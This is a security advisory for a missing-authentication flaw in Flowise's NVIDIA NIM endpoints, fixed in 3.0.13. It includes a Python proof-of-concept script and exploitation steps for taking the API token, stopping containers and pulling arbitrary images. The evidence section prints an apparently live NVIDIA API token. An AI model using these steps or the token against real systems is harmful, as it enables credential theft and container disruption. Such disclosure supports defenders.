Flowise Missing Authentication on NVIDIA NIM Endpoints

Description

Missing Authentication on NVIDIA NIM Endpoints

Summary

The NVIDIA NIM router (/api/v1/nvidia-nim/*) is whitelisted in the global authentication middleware, allowing unauthenticated access to privileged container management and token generation endpoints.

Vulnerability Details

Field Value
CWE CWE-306: Missing Authentication for Critical Function
Affected File packages/server/src/utils/constants.ts
Affected Line Line 20 ('/api/v1/nvidia-nim' in WHITELIST_URLS)
CVSS 3.1 8.6 (High)

Root Cause

In packages/server/src/utils/constants.ts, the NVIDIA NIM route is added to the authentication whitelist:

export const WHITELIST_URLS = [
    // ... other URLs
    '/api/v1/nvidia-nim',  // Line 20 - bypasses JWT/API-key validation
    // ...
]

This causes the global auth middleware to skip authentication checks for all endpoints under /api/v1/nvidia-nim/*. None of the controller actions in packages/server/src/controllers/nvidia-nim/index.ts perform their own authentication checks.

Affected Endpoints

Method Endpoint Risk
GET /api/v1/nvidia-nim/get-token Leaks valid NVIDIA API token
GET /api/v1/nvidia-nim/preload Resource consumption
GET /api/v1/nvidia-nim/download-installer Resource consumption
GET /api/v1/nvidia-nim/list-running-containers Information disclosure
POST /api/v1/nvidia-nim/pull-image Arbitrary image pull
POST /api/v1/nvidia-nim/start-container Arbitrary container start
POST /api/v1/nvidia-nim/stop-container Denial of Service
POST /api/v1/nvidia-nim/get-image Information disclosure
POST /api/v1/nvidia-nim/get-container Information disclosure

Impact

1. NVIDIA API Token Leakage

The /get-token endpoint returns a valid NVIDIA API token without authentication. This token grants access to NVIDIA's inference API and can list 170+ LLM models.

Token obtained:

{
  "access_token": "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",
  "token_type": "Bearer",
  "expires_in": 3600
}

Token validation:

curl -H "Authorization: Bearer nvapi-GT-..." https://integrate.api.nvidia.com/v1/models
# Returns list of 170+ available models

2. Container Runtime Manipulation

On systems with Docker/NIM installed, an unauthenticated attacker can:
- List running containers (reconnaissance)
- Stop containers (Denial of Service)
- Start containers with arbitrary images
- Pull arbitrary Docker images (resource consumption, potential malicious images)

Proof of Concept

poc.py

#!/usr/bin/env python3
"""
POC: Privileged NVIDIA NIM endpoints are unauthenticated

Usage:
  python poc.py --target http://127.0.0.1:3000 --path /api/v1/nvidia-nim/get-token
"""

import argparse
import urllib.request
import urllib.error

def main():
    ap = argparse.ArgumentParser()
    ap.add_argument("--target", required=True, help="Base URL, e.g. http://host:port")
    ap.add_argument("--path", required=True, help="NIM endpoint path")
    ap.add_argument("--method", default="GET", choices=["GET", "POST"])
    ap.add_argument("--data", default="", help="Raw request body for POST")
    args = ap.parse_args()

    url = args.target.rstrip("/") + "/" + args.path.lstrip("/")
    body = args.data.encode("utf-8") if args.method == "POST" else None
    req = urllib.request.Request(
        url,
        data=body,
        method=args.method,
        headers={"Content-Type": "application/json"} if body else {},
    )

    try:
        with urllib.request.urlopen(req, timeout=10) as r:
            print(r.read().decode("utf-8", errors="replace"))
    except urllib.error.HTTPError as e:
        print(e.read().decode("utf-8", errors="replace"))

if __name__ == "__main__":
    main()

<img width="1581" height="595" alt="screenshot" src="https://github.com/user-attachments/assets/85351a88-64ce-4e2c-8e67-98f217fcf989" />

Exploitation Steps

# 1. Obtain NVIDIA API token (no authentication required)
python poc.py --target http://127.0.0.1:3000 --path /api/v1/nvidia-nim/get-token

# 2. List running containers
python poc.py --target http://127.0.0.1:3000 --path /api/v1/nvidia-nim/list-running-containers

# 3. Stop a container (DoS)
python poc.py --target http://127.0.0.1:3000 --path /api/v1/nvidia-nim/stop-container \
  --method POST --data &#x27;{&quot;containerId&quot;:&quot;&lt;target_id&gt;&quot;}&#x27;

# 4. Pull arbitrary image
python poc.py --target http://127.0.0.1:3000 --path /api/v1/nvidia-nim/pull-image \
  --method POST --data &#x27;{&quot;imageTag&quot;:&quot;malicious/image&quot;,&quot;apiKey&quot;:&quot;any&quot;}&#x27;

Evidence

Token retrieval without authentication:

$ python poc.py --target http://127.0.0.1:3000 --path /api/v1/nvidia-nim/get-token
{&quot;access_token&quot;:&quot;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&quot;,&quot;token_type&quot;:&quot;Bearer&quot;,&quot;refresh_token&quot;:null,&quot;expires_in&quot;:3600,&quot;id_token&quot;:null}

Token grants access to NVIDIA API:

$ curl -H &quot;Authorization: Bearer nvapi-GT-...&quot; https://integrate.api.nvidia.com/v1/models
{&quot;object&quot;:&quot;list&quot;,&quot;data&quot;:[{&quot;id&quot;:&quot;01-ai/yi-large&quot;,...},{&quot;id&quot;:&quot;meta/llama-3.1-405b-instruct&quot;,...},...]}

Container endpoints return 500 (not 401) proving auth bypass:

$ python poc.py --target http://127.0.0.1:3000 --path /api/v1/nvidia-nim/list-running-containers
{&quot;statusCode&quot;:500,&quot;success&quot;:false,&quot;message&quot;:&quot;Container runtime client not available&quot;,&quot;stack&quot;:{}}

References

Basic information

Type
reviewed
Severity
high
Advisory on GitHub
Open advisory ↗
Repository advisory
Open repository advisory ↗
Source code
Browse source ↗
Published (advisory)
2026-03-06 22:21:38 UTC
Updated
2026-03-09 13:15:56 UTC
GitHub reviewed
2026-03-06 22:21:38 UTC
NVD published
2026-03-07

EPSS Score

Score Percentile
7.75% 91.96%

CVSS Scores

Base score Version Severity Vector
7.7 4.0
CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:N/SC:H/SI:N/SA:N Click to expand
Attack vector (AV:N)
Could be attacked over the internet or any normal routed network.
Attack complexity (AC:L)
Exploitation conditions are straightforward and stable.
Attack requirements (AT:N)
No additional preconditions are required beyond normal reachability.
Privileges required (PR:N)
No privileges are required.
User interaction (UI:N)
No user interaction is required.
Vulnerable system confidentiality impact (VC:N)
No confidentiality impact on the vulnerable system.
Vulnerable system integrity impact (VI:N)
No integrity impact on the vulnerable system.
Vulnerable system availability impact (VA:N)
No availability impact on the vulnerable system.
Subsequent system confidentiality impact (SC:H)
High confidentiality impact on subsequent systems.
Subsequent system integrity impact (SI:N)
No integrity impact on subsequent systems.
Subsequent system availability impact (SA:N)
No availability impact on subsequent systems.

Identifiers

CWEs

CWE id Name
CWE-306 Missing Authentication for Critical Function

Credits

  • tenbbughunters (reporter)

Affected packages (1)

Vulnerable version ranges and first patched releases as published by GitHub.

Ecosystem Package Vulnerable range First patched Vulnerable functions
npm flowise <= 3.0.12 3.0.13

References

cvelogic Threat Intelligence